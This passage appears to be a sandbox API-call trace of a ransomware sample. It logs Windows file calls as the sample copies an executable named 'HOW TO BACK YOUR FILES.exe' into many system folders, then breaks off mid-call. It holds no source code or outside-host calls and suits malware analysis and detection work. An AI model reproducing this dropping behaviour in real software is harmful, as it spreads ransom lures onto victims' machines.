ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.660] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0090.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.660] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 119 [0090.660] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0090.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.661] GetLastError () returned 0x0 [0090.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.661] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.661] CloseHandle (hObject=0x120) returned 1 [0090.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.661] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66bd5320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66bd5320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.661] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0090.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0090.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.661] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 125 [0090.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0090.661] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.661] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.662] GetLastError () returned 0x0 [0090.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.662] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.662] CloseHandle (hObject=0x120) returned 1 [0090.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.662] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.662] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0090.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.663] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 119 [0090.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0090.663] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.663] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.663] GetLastError () returned 0x0 [0090.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.663] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.663] CloseHandle (hObject=0x120) returned 1 [0090.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.664] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d520e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66d520e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.664] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0090.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0090.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.664] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 125 [0090.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0090.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.665] GetLastError () returned 0x0 [0090.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.665] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.665] CloseHandle (hObject=0x120) returned 1 [0090.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.665] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device" [0090.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.665] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device") returned 82 [0090.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device" [0090.665] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.665] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\device\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.666] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.666] GetLastError () returned 0x0 [0090.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.666] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.666] CloseHandle (hObject=0x120) returned 1 [0090.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.666] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.667] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0090.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.667] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 121 [0090.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0090.667] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.667] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.668] GetLastError () returned 0x0 [0090.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.668] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.668] CloseHandle (hObject=0x120) returned 1 [0090.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.668] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66dea660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66dea660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0090.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.668] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 121 [0090.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0090.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.669] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.669] GetLastError () returned 0x0 [0090.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.669] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.669] CloseHandle (hObject=0x120) returned 1 [0090.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.669] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.669] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66eceea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66eceea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.669] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto" [0090.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0090.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.670] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto") returned 69 [0090.670] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto" [0090.670] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.670] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR 